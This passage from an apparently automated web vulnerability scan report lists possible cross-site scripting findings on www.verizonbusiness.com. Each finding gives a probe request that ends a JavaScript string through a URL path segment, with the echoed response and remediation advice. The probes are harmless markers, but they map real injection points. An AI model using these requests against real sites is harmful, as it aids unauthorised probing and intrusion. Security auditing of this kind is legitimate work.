This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/ip-telephonye393e'%3b5bc61607e6b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:02 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43482
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/ip-telephonye393e';5bc61607e6b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.55. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/managed-ucc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6f33'%3bb873c7f4470 was submitted in the REST URL parameter 1. This input was echoed as d6f33';b873c7f4470 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsd6f33'%3bb873c7f4470/communications/managed-ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productsd6f33';b873c7f4470/communications/managed-ucc/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.56. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/managed-ucc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f455"%3ba74a0a7c1f3 was submitted in the REST URL parameter 1. This input was echoed as 8f455";a74a0a7c1f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products8f455"%3ba74a0a7c1f3/communications/managed-ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products8f455";a74a0a7c1f3/communications/managed-ucc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.57. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/managed-ucc/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b785"%3b0e01037d68b was submitted in the REST URL parameter 2. This input was echoed as 5b785";0e01037d68b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications5b785"%3b0e01037d68b/managed-ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications5b785";0e01037d68b/managed-ucc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.58. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/managed-ucc/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9944'%3beec5dd5d94f was submitted in the REST URL parameter 2. This input was echoed as c9944';eec5dd5d94f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communicationsc9944'%3beec5dd5d94f/managed-ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:52 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communicationsc9944';eec5dd5d94f/managed-ucc/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.59. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/managed-ucc/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e1e8'%3b5301a9fab19 was submitted in the REST URL parameter 3. This input was echoed as 1e1e8';5301a9fab19 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/managed-ucc1e1e8'%3b5301a9fab19/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43482
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/managed-ucc1e1e8';5301a9fab19/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.60. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/managed-ucc/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3538"%3b1fefbc24146 was submitted in the REST URL parameter 3. This input was echoed as a3538";1fefbc24146 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/managed-ucca3538"%3b1fefbc24146/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43482
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
x.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/managed-ucca3538";1fefbc24146/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.61. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80f92'%3bc860afee35d was submitted in the REST URL parameter 1. This input was echoed as 80f92';c860afee35d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products80f92'%3bc860afee35d/communications/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products80f92';c860afee35d/communications/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.62. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a44e"%3bc33ca53e907 was submitted in the REST URL parameter 1. This input was echoed as 3a44e";c33ca53e907 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products3a44e"%3bc33ca53e907/communications/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products3a44e";c33ca53e907/communications/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.63. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a226'%3bc45d855bf03 was submitted in the REST URL parameter 2. This input was echoed as 2a226';c45d855bf03 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications2a226'%3bc45d855bf03/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications2a226';c45d855bf03/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.64. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f774"%3ba662e543ebf was submitted in the REST URL parameter 2. This input was echoed as 5f774";a662e543ebf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications5f774"%3ba662e543ebf/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications5f774";a662e543ebf/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.65. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 519a6"%3bad5a04e7aa5 was submitted in the REST URL parameter 3. This input was echoed as 519a6";ad5a04e7aa5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/prof-svcs519a6"%3bad5a04e7aa5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43476
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/prof-svcs519a6";ad5a04e7aa5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.66. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d382b'%3bd8c99d93b9b was submitted in the REST URL parameter 3. This input was echoed as d382b';d8c99d93b9b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/prof-svcsd382b'%3bd8c99d93b9b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43476
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/prof-svcsd382b';d8c99d93b9b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.67. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
